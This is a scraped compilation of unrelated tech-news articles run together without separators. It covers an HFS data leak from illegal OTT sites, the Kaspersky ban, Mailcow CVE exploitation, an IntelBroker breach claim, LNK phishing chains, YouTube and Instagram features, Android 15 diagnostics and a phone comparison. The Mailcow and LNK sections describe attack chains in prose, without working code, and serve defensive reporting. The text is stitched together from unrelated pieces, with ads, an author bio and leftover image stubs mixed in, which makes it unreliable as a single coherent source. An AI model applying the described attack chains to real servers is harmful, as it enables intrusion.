A recent rise in data breaches from illegal Chinese OTT platforms exposes that user information, including names and financial details, is vulnerable to exploitation by criminals.
The leaked information can be used for phishing attacks, financial fraud, and even harassment, as these illegal OTT services often operate under the radar.
This makes it difficult to hold them accountable and further increases the risk of user data exposure.
Illegal Chinese OTT services are leaking user data through vulnerabilities in HFS (HTTP File Server) used for file sharing.
Free Webinar on API vulnerability scanning for OWASP API Top 10 vulnerabilities -> Book Your Spot
HFS, a standalone executable web service, allows uploading and sharing videos and files but suffers from security weaknesses that expose this data.
It is especially concerning for servers using the unstable 2.3 beta version of HFS, which is riddled with vulnerabilities and easily compromised by hackers.
Users can potentially identify illegal servers located in China by leveraging the asset search function within a tool called Criminal IP, which exploits a vulnerability in some web servers, specifically those using the “HFS” (HTTP File Server) protocol.
Search results on Criminal IP for HFS
By crafting a query like “title: “HFS/”” within Criminal IP, the tool searches for servers with this signature, potentially revealing unsecured or malicious servers operating in China, relying on the assumption that servers employing outdated or vulnerable protocols are more likely to be involved in illegal activities.
Personal information exposed in TXT files
HFS server version 2.3 beta, used by illegal OTT platforms, exposes sensitive user data in plain text files within the server’s output folder, named “Login Denied” and “Authentication Code,” which contain user information including names, addresses, phone numbers, and even credit card details, potentially impacting a large number of South Korean users and raising security concerns for the platform and its users.
Illegal Chinese OTT sites operating while changing domains
Domain fluxing is a method of quickly changing domain addresses that illegal OTT service operators use to avoid being caught and to get around government oversight, which makes it harder to shut down these bad services and leaves users open to data breaches because there are not strong security protocols in place.
According to Crmininal IP, to counter these evasive tactics, law enforcement and content providers should focus on identifying and blocking these services at the network level, independent of their ephemeral domain names.
It can be achieved through techniques such as IP address blocking, traffic filtering, and collaborating with internet service providers (ISPs) to disrupt the distribution of illegal content.
FreeWebinar! 3 Security Trends to Maximize MSP Growth -> Register For Free
The US government will ban the sale of Kaspersky antivirus products to new customers in the United States starting July 20, with a follow-on deadline to prohibit the cybersecurity company from providing users with software updates after September 29.
The move follows years of allegations that the cybersecurity firm served as a hacking conduit for Russian intelligence agencies—allegations that the company has consistently denied.
While current US Kaspersky customers will see no immediate impact from the ban, the September 29 software update deadline signals a bigger change. Without available updates, any cybersecurity product becomes less secure over time, and means the company won’t be able to protect customers against the newest threats.
In a briefing call with reporters on Thursday, US Department of Commerce Secretary Gina Raimondo offered consolation and advice to current customers of the antivirus products:
“You have done nothing wrong, and you are not subject to any criminal or civil penalties. However, I would encourage you, in as strong as possible terms, to immediately stop using that software and switch to an alternative in order to protect yourself and your data and your family.”
“Kaspersky does not engage in activities which threaten US national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted US interested and allies,” the company said. “The company intends to purse all legally available options to preserve its current operations and relationships.”
The ban, first reported by Reuters and released Thursday, includes “AO Kaspersky Lab,” “OOO Kaspersky Group,” and “Kaspersky Labs Limited.”
According to the US Department of Commerce, all three Kaspersky entities are being banned “for their cooperation with Russian military and intelligence authorities in support of the Russian government’s cyber intelligence objectives.”
In October 2017, The New York Times reported that Israeli intelligence officers managed to catch Russian government hackers using Kaspersky to conduct clandestine searches across the globe. That reporting followed a bombshell investigation from The Wall Street Journal that claimed that Russian hackers stole classified NSA materials from a contractor’s personal computer which had Kaspersky software installed on it.
In the same Thursday briefing call, Secretary Raimondo cited the threat of Russian influence in the Department’s decision to ban Kaspersky:
“Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today.”
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
On the left-hand side, you have album info: name, band, artist, release date, track count, total length, and description from Wikipedia that you can expand. You then have a play/pause button, and options to download, save to the library, share, and an overflow menu.
Songs appear at the right.
Playlists are getting the same treatment for a dense look that takes advantage of the larger screens on laptops and desktops. This is a great new addition to the YouTube Music web player look, and it makes it more convenient just like the app.
YouTube Music has been getting some update love recently in order to better rival the likes of Spotify and Apple Music. For example, YouTube Music is now working on an AI feature that will let you ask for music, and also you’ll be getting the option to upvote playlists just like Spotify soon.
Izzy, a tech enthusiast and a key part of the PhoneArena team, specializes in delivering the latest mobile tech news and finding the best tech deals. Her interests extend to cybersecurity, phone design innovations, and camera capabilities. Outside her professional life, Izzy, a literature master’s degree holder, enjoys reading, painting, and learning languages. She’s also a personal growth advocate, believing in the power of experience and gratitude. Whether it’s walking her Chihuahua or singing her heart out, Izzy embraces life with passion and curiosity.
Two critical vulnerabilities (CVE-2024-31204 and CVE-2024-30270) affecting Mailcow versions before 2024-04 allow attackers to execute arbitrary code on the server.
An attacker can exploit these vulnerabilities by sending a specially crafted email to an administrator.
When the administrator views the email while logged into the admin panel, the attacker can inject malicious scripts and gain complete control of the server.
Mailcow’s admin panel in PHP uses a custom exception handler to store error messages in the user session, which are then retrieved and displayed in an alert box on the next page load.
Result
The process involves parsing the session data, injecting the error messages into a JavaScript function call within a template, and finally rendering an alert box using a JavaScript library upon receiving the message in the browser.
It creates a vulnerability because the error messages are not sanitized before being displayed, potentially allowing attackers to inject malicious scripts.
CVE-2024-31204 is an XSS vulnerability in MailCow’s admin panel that exists because the jQuery-based notification library doesn’t escape HTML entities properly, allowing attackers to inject malicious scripts by controlling the content of an exception being raised.
resulting string representation
The attacker can achieve this because the exception handler uses print_r() to include function call stack arguments in the error message, which bypasses Twig’s escaping mechanism.
By sending a malicious email with a background image that references the vulnerable API endpoint with a specially crafted URL, an attacker can exploit the explode() function in json_api.php by providing an array as input through a crafted query string.
The email client, bypassing restrictions due to the relative URL, executes the script embedded in the query string, injecting an XSS payload into the victim’s session for exploitation upon their next visit to the admin panel.
malicious request
SonarCloud discovered a vulnerability (CVE-2024-30270) in MailCow’s rspamd_maps function that allows an attacker to overwrite arbitrary files, stems from insufficient validation of user-supplied input, which can lead to an attacker crafting a path traversal payload to overwrite system files.
While this vulnerability can’t be used for arbitrary file creation due to existence checks, an attacker could overwrite critical PHP files with malicious code to compromise the server.
An attacker can exploit a writable template cache directory in Mailcow’s Twig templating engine, and by overwriting a compiled template file with malicious code, the attacker can execute arbitrary commands when the corresponding page is accessed.
While Mailcow’s disabled PHP functions mitigate this, the mail() function remains enabled, allowing attackers to craft emails with multi-stage payloads to bypass these restrictions and execute commands on the server.
The mailcow maintainers addressed the XSS vulnerability (CVE-2024-31204) by encoding all HTML special characters in exception details before rendering them in the template.
For the file path vulnerability (CVE-2024-30270), they strengthened the validation logic to ensure only allowed map types are used.
Additionally, they implemented new security measures to prevent similar attacks in the future by adding checks to differentiate between API requests and normal web requests by looking for specific headers sent by browsers, such as the Referer header and the Sec-Fetch-Dest header.
FreeWebinar! 3 Security Trends to Maximize MSP Growth -> Register For Free
A moderator of the notorious data breach trading platform BreachForums is offering data for sale they claim comes from a data breach at T-Mobile.
The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.” (We’ve not heard of siloprograms, and can’t find a reference to them anywhere, so perhaps it’s a mistranslation or typo.)
Post offereing data for sale supposedly from a T-Mobile internal breach
To prove they had the data, IntelBroker posted several screenshots showing access with administrative privileges to a Confluence server and T-Mobile’s internal Slack channels for developers.
But according to sources known to BleepingComputer, the data shared by IntelBroker actually consists of older screenshots. These screenshots show T-Mobile’s infrastructure, posted at a known—yet unnamed—third-party vendor’s servers, from where they were stolen.
When we looked at the screenshots IntelBroker attached to their post, we spotted something interesting in one of them.
Found CVE-2024-1597
This screenshot shows a search query for a critical vulnerability in Jira, a project management tool used by teams to plan, track, release and support software. It’s typically a place where you could find the source code of works in progress.
The search returns the result CVE-2024-1597, a SQL injection vulnerability. SQL injection happens when a cybercriminal injects malicious SQL code into a form on a website, such as a login page, instead of the data the form is asking for. The vulnerability affects Confluence Data Center and Server according to Atlassian’s May security bulletin.
For a better understanding, it’s important to note that Jira and Confluence are both products created by Atlassian, where Jira is the project management and issue tracking tool and Confluence is the collaboration and documentation tool. They are often used together.
If IntelBroker has a working exploit for the SQL injection vulnerability, this could also explain their claim that they have the source code of three internal tools used at Apple, including a single sign-on authentication system known as AppleConnect.
This theory is supported by the fact that IntelBroker is also offering a Jira zero-day for sale.
IntelBroker selling zero-day for JIra
“I’m selling a zero-day RCE for Atlassian’s Jira.
Works for the latest version of the desktop app, as well as Jira with confluence.
No login is required for this, and works with Okta SSO.”
If this is true then this exploit, or its fruits, might be used for data breaches that involve personal data.
Meanwhile, T-Mobile has denied it has suffered a breach, saying it is investigating whether there has been a breach at a third-party provider.
“We have no indication that T-Mobile customer data or source code was included and can confirm that the bad actor’s claim that T-Mobile’s infrastructure was accessed is false.”
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
LNK files, a shortcut file type in Windows OS, provide easy access to programs, folders, or websites.
Created automatically during shortcut creation or manually by users, LNK files contain the target location and other information useful for threat intelligence.
It includes details like the machine identifier where the LNK was built, volume labels, and drive serial numbers, while the .lnk extension is hidden by default in Windows, making identification rely on user awareness or command-line queries.
Attackers exploit LNK files, a shortcut file format, to bypass detection and deliver malware like Qakbot, Rhadamanthys, Remcos, and Amadey, which are disguised as legitimate files (executables or PDFs) and trick users into clicking on them.
Rhadamathys LNK Phishing Campaign
This compromises the user’s system or network, and by analyzing active LNK phishing campaigns, defenders can learn attacker tactics and use tools like LECmd to extract LNK content to better understand the attack.
Threat actors leverage LNK files in phishing campaigns to deploy malware and conduct reconnaissance, and this is done by embedding malicious scripts or commands within the LNK.
Upon user interaction, the LNK triggers these scripts, which can download malware, steal data, or gather system information.
LNK Recon
Examples include using LNK to download AsyncRAT or Rhadamanthys trojan, obfuscating PowerShell scripts using techniques like caret symbols, and crafting LNKs to resemble legitimate files like PDFs, which increases the success rate of tricking users into clicking the malicious LNK.
A malicious LNK file leverages LOLBIN for files to initiate a PowerShell script that executes obfuscated commands, which decrypt encoded data within the LNK and create a decoy DOCX file alongside a malicious CAB archive.
LNK Obfuscated Powershell
The PowerShell script then utilizes expand.exe to extract the CAB file, which contains a VBScript, batch files, and a legitimate unzip.exe utility.
VBScript leverages a COM object to execute a batch file that establishes persistence via registry modification and executes additional batch files, which download malicious payloads, steal system information, and communicate with C2 servers.
LNK Attack Chain
The research by Splunk describes three methods for simulating LNK phishing campaigns to test organizational defenses. The first method utilizes Atomic Red Team’s Invoke-AtomicTest to write an LNK to the startup folder that triggers a command prompt upon user login.
The second method uses LNK Generator, which simplifies creating desktop shortcuts with various functionalities.
Examples include generating a CMD shortcut or a PowerShell script shortcut that downloads and executes an MSI package.
The third method leverages Atomic Red Team tests to simulate a malicious LNK file embedded with a CAB file, and by examining real-world malicious LNK files, security analysts can gain insights to develop and test detection capabilities.
FreeWebinar! 3 Security Trends to Maximize MSP Growth -> Register For Free
It’s mindboggling how many lives have been destroyed since the rise of AI-generated content. The fact that you can’t do anything against AI deepfakes of yourself is one of the many issues many people confronted with.
Big social media companies like Meta and Google do very little to protect their customers’ privacy. YouTube has finally announced that it’s expanding its privacy request process to allow users to request the removal of AI-generated or other synthetic or altered content of themselves.
According to the social company, the decision to have a more responsible approach to AI-generated content is related to the fact that AI deepfakes have become more common lately. In other words, they have received so much negative feedback that they’re now forced to make some changes.
In any case, those who would like to request the removal of their AI deepfake(s) must use YouTube’s privacy request process. The service will evaluate the request and consider “a variety of factors before removal,” such as whether the content is altered or synthetic and could be mistaken for real.
However, YouTube doesn’t seem to be too keen on removing what it tags as parody and satire content involving well-known figures. Obviously, YouTube will also check whether the person making the request is identifiable.
Last but not least, YouTube announced that creators notified about privacy complaints will not receive any strikes since privacy violations are separate from Community Guidelines strikes.
Instagram users now have the option to start Lives only accessible to members of their Close Friends list. Until now, you could only restrict live streams to individual profiles.
For a while now, Instagram has allowed you to create a Close Friends list. People included in the list can see the Stories and posts (pics/Reels) you upload through that option, while the rest of your contacts cannot. However, the feature still feels a bit lacking in functionality. It seems that Meta wants to start solving this since they announced a new privacy feature related to Lives.
Instagram now allows you to restrict Lives to Close Friends
An option to start Instagram Lives that only your Close Friends can access will now be available. This will help you quickly limit the number of people who can access your Lives, instead of having to waste a lot of time adding each individual profile to the restricted list. If you have thousands of followers, hiding your live streams from a certain audience could become a rather tedious process.
The new feature to restrict Instagram lives allows up to three people from your Close Friends list to join. According to Meta, this will allow you to quickly start more intimate Lives to organize things or do collaborative tasks. It would even open up new monetization possibilities for creators. They could offer private Lives for followers who pay a subscription, for example.
Instagram has also added other new features. Among them is the possibility of adding music to carousel posts that include videos. Until now, you could only do it with posts that included images. In addition, they remembered that the Notes feature also supports videos. This is something that many were unaware of, since most only uploaded music or text in their Notes. So, the company wanted to remember how to get the most out of Instagram features.
For the average user, diagnosing potential hardware issues on their device can be a somewhat complicated process. However, Google wants to make this easier by integrating on-device diagnostics into Android 15. This will allow you to know if your phone has a fault in a key part before taking it for technical service. This joins privacy options such as Repair Mode which Pixels and some other brands have.
The on-device diagnostics tool was spotted by Android Authority in the latest Android 15 Beta 3. The option is not available by default, but it can be enabled. Once you have it, you can access it by going to Settings > System > Device Diagnostics.
The on-device diagnostics tool has two main display items: “Component health” and “Evaluation mode.” The “Component health” section will allow you to run manual tests on your phone/tablet. On the other hand, “Evaluation mode” allows you to evaluate your current device using another device.
This is what the Android 15 on-device diagnostics tool would be like
Starting with “Component health,” it includes screen integrity and touch performance tests. It also allows you to check the current status of your battery and storage chip. Regarding the battery, it shows data such as the percentage of remaining capacity, manufacturing date, first date of use, and even the number of charging cycles.
There are also entries for “serial number” and “part status.” These ones do not seem to be functional currently. Then, in storage status, you can check the remaining useful life of the storage chip, as well as its total capacity.
Moving on to “Evaluation mode,” it is a test where you will have to use another supported device. The process begins with scanning a QR, and some tests require internet access.
Useful to detect issues before going to technical service
Overall, the Android 15 on-device diagnostics tool will give you a pretty good general idea of the status of your device’s hardware. For example, it can help you detect potential issues with dead pixels, light leaks, or discoloration on screens. Also, know how healthy your battery is. It’s noteworthy that there are some third-party apps that do similar tests. However, having a tool integrated directly into the OS is a welcome addition.
Both Samsung and Vivo released their ‘Ultra’ devices this year. Samsung’s came in January, while Vivo’s followed in May. We’re here to compare those two phones, the Samsung Galaxy S24 Ultra vs Vivo X100 Ultra. Do note that the Vivo X100 Ultra launched in China only, though. The phone does not have a global variant. The Vivo X100 Pro is basically the flagship model for global markets. We already compared that one to the Galaxy S24 Ultra, by the way.
With that in mind, we’ll check out the two ‘Ultra’ devices. Both of these phones are large and powerful, but also different in a number of ways. We’ll list their specifications, and will then move to compare their designs, displays, performance, battery life, cameras, and audio output. With that in mind, let’s get started, shall we?
Specs
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra, respectively
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Design
As you can see in the image above, the two phones look very different. The Galaxy S24 Ultra has sharp corners, while the opposite is true for the Vivo X100 Ultra. Both phones do have a centered display camera hole and very thin bezels around their displays. The Galaxy S24 Ultra includes a flat display, while the Vivo X100 Ultra has a curved display. The Vivo X100 Ultra does look narrower, that’s because it is. It’s considerably narrower than the Galaxy S24 Ultra while being slightly taller and thicker. It is also a couple of grams lighter.
The Galaxy S24 Ultra has a frame made out of titanium and a glass back. The Vivo X100 Ultra frame is made out of aluminum, while glass is included on its back. The Vivo X100 Ultra backplate curves into the frame on the sides, as does its front side. The Galaxy S24 Ultra is a lot more flat on the back, proportional to its front side. Both phones include physical buttons on the right-hand side.
The Galaxy S24 Ultra has four cameras on the back and five separate circles in the top-left corner. The Vivo X100 Ultra includes a large camera oreo on the back instead. There are three cameras in there, and that camera oreo is centered in the top portion of the phone’s back. Both phones are IP68 certified for water and dust resistance. Both of them are also very slippery, by the way. Glass is usually a recipe for slippery devices, and the same is the case here. They also feel different in the hand, but both have that premium feel to them.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Display
There is a 6.8-inch QHD+ (3120 x 1440) Dynamic LTPO AMOLED 2X display included on the Galaxy S24 Ultra. That display is flat, and it has an adaptive refresh rate of up to 120Hz. HDR10+ content is supported, and the phone’s display goes up to 2,600 nits. The display aspect ratio is 19.5:9, while the screen-to-body ratio is at around 88%. This display is protected by the Gorilla Glass Armor from Corning.
The Vivo X100 Ultra, on the flip side, has a 6.78-inch QHD+ (3200 x 1440) LTPO AMOLED display. This phone has a curved display. The panel can project up to 1 billion colors, and it also has an adaptive refresh rate of up to 120Hz. Dolby Vision is supported, as is HDR content. The maximum display brightness is set at 3,000 nits. The display aspect ratio here is 20:9, while the screen-to-body ratio is around 89%. There’s no info on display protection, though.
Both displays are vivid and very sharp, no problem there. They also have great viewing angles, and very good touch response as well. The blacks are deep, as they should be on AMOLED displays. The thing is, the Gorilla Armor on the Galaxy S24 Ultra does a much better job of keeping reflections at bay. It’s noticeably less reflective than displays on competitor phones, including the Vivo X100 Ultra. That much is worth noting. Both displays get more than bright enough, even in direct sunlight.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Performance
The Snapdragon 8 Gen 3 for Galaxy fuels the Samsung Galaxy S24 Ultra. That is basically an overclocked Snapdragon 8 Gen 3. Samsung also included 12GB of LPDDR5X RAM on the Galaxy S24 Ultra. The same goes for UFS 4.0 flash storage. The Vivo X100 Ultra is fueled by the Snapdragon 8 Gen 3. The phone offers up to 16GB of LPDDR5X RAM and UFS 4.0 flash storage too.
In regards to performance, both phones do a wonderful job. Just keep in mind that the Vivo X100 Ultra doesn’t come with global software, so you’ll need to sideload Google services if you want to use them. They are extremely smooth when it comes to regular, everyday tasks like opening apps, multitasking, consuming multimedia, and so on. Slowing them down is not an easy feat, that’s for sure. They’re basically on par in that regard.
The same level of performance does transfer to gaming too, basically. Both of these phones offer great performance even with the most demanding games out there. They can run Genshin Impact without a problem. Yes, both phones will get rather warm if you end up playing demanding games for a while, but not too warm. The performance will also remain unscathed, pretty much, and that’s a win.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Battery
There is a 5,000mAh battery included inside the Galaxy S24 Ultra. The Vivo X100 Ultra, on the flip side, includes a 5,500mAh battery pack. Both of these phones have outstanding battery life. Those of you who don’t do a lot of graphically demanding tasks on phones could even be able to get over the 8-hour screen-on-time mark on both phones in a single day… while not being too careful.
The battery life on both of these phones is that good, yes. They’re amongst the best smartphones for battery life when it comes to flagship devices. Your mileage will vary, of course, as this is the battery life we’re talking about. Some of you will fly under this mark, others probably above it, it all depends on a number of factors. The bottom line is that both smartphones offer great battery life, there’s no doubt about it.
When it comes to charging, the Vivo X100 Ultra takes the cake, in several ways. It offers faster wired and wireless charging, while it also comes with a charger in the box. It supports 80W wired, 30W wireless, and 5W reverse wired charging. The Galaxy S24 Ultra offers 45W wired, 15W wireless, and 4.5W reverse wireless charging. Unlike the Vivo X100 Ultra, however, this handset does not include a charger in the box.
Samsung Galaxy S24 Ultra vs Vivo X100 Ultra: Cameras
The Samsung Galaxy S24 Ultra has four rear-facing cameras. There’s a 200-megapixel main camera, a 12-megapixel ultrawide unit (120-degree FoV), a 10-megapixel telephoto camera (3x optical zoom), and a 50-megapixel periscope telephoto camera (5x optical zoom). The Vivo X100 Ultra has a 50-megapixel main camera (gimbal OIS), a 50-megapixel ultrawide camera (116-degree FoV), and a 200-megapixel periscope telephoto unit (3.7x optical zoom). ZEISS optics are a part of the Vivo X100 Ultra package, by the way.
Both of these phones capture outstanding photos. There are differences, though. They both prefer warmer colors, to a degree, and both sets of images do end up looking a bit processed. The Galaxy S24 Ultra can still push processing a bit too far at times, though. The colors are great on both most of the time, but Samsung’s phones has the tendency of pushing the saturation a bit too high at times. Other than that, the results from both are great. The Vivo X100 Ultra’s ultrawide camera does tend to provide better results more often than not, and the same goes for the periscope camera, especially at higher zoom levels.
In low light, both phones perform really well, especially when it comes to their main cameras. The Vivo X100 Ultra does tend to deal with light reflections a bit better than the Galaxy S24 Ultra. Other than that, the images from both look great. Their secondary cameras are usable in low light, for sure, but the main shooters are preferable.
Audio
There is a set of stereo speakers on both of these smartphones. The ones on the Galaxy S24 Ultra are a bit louder, though. The difference is not big, but it’s noticeable. The sound output is well-balanced on both, though.
Neither phone includes an audio jack. You can always use their Type-C ports for wired audio connections, though. If not, there’s Bluetooth 5.3 included on the Galaxy S24 Ultra, and Bluetooth 5.4 on the Vivo X100 Ultra for wireless connections.
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
